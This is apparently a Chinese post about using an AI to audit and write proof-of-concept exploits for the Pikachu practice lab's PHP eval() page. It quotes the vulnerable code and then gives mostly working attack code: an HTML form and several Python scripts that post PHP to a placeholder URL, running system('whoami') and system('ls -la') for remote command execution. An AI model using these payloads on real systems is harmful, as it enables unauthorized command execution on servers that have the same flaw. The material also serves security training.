AI代码审计和POC编写

路径：C:phpstudy_proWWWpikachuvulrcerce_eval.phpif(isset($_POST['submit']) && $_POST['txt'] != null){    if(@!eval($_POST['txt'])){        $html.="<p>你喜欢的字符还挺奇怪的!</p>";    }}

<!DOCTYPE html><html><head>    <title>POC: Exploit for eval() vulnerability</title></head><body>    <h1>POC: Exploit for eval() vulnerability</h1>    <form action="http://your-vulnerable-site.com/vulnerable-page.php" method="POST">        <label for="txt">Enter PHP code to execute:</label>        <textarea name="txt" id="txt" rows="10" cols="50"><?php echo phpinfo(); ?></textarea><br><br>        <input type="hidden" name="submit" value="1">        <input type="submit" value="Submit">    </form></body></html>

import requests# 目标网站的 URLurl = "http://your-vulnerable-site.com/vulnerable-page.php"# 要执行的 PHP 代码（作为字符串发送）malicious_code = "<?php echo 'Vulnerable!'; system('whoami'); ?>"# 构建 POST 数据post_data = {    'txt': malicious_code,    'submit': '1'  # 假设后端检查这个字段来确定是否处理请求}# 发送 POST 请求response = requests.post(url, data=post_data)# 输出响应内容print(response.text)

import requests# 目标URL（替换为你的目标URL）target_url = "http://example.com/vulnerable_script.php"# 构造POST数据# 尝试执行一个简单的echo语句post_data = {    'submit': '1',  # 确保submit字段存在    'txt': 'echo "Hello from eval!";'  # 尝试输出字符串}# 发送POST请求response = requests.post(target_url, data=post_data)# 打印响应内容print(response.text)

就照着'txt': 'echo "Hello from eval!";' 的格式，写一个system函数的poc

import requests# 目标URL（替换为你的目标URL）target_url = "http://example.com/vulnerable_script.php"# 注意：在Windows系统上，应使用'dir'而不是'ls'# 构造POST数据，尝试执行system函数列出当前目录内容# 对于Unix/Linux系统post_data_unix = {    'submit': '1',  # 确保submit字段存在    'txt': 'system("ls -la");'  # 尝试执行ls命令列出目录内容}# 对于Windows系统# post_data_windows = {#     'submit': '1',#     'txt': 'system("dir");'  # 尝试执行dir命令列出目录内容# }# 选择适当的POST数据（根据你的目标系统）post_data = post_data_unix  # 或者 post_data_windows# 发送POST请求response = requests.post(target_url, data=post_data)# 打印响应内容print(response.text)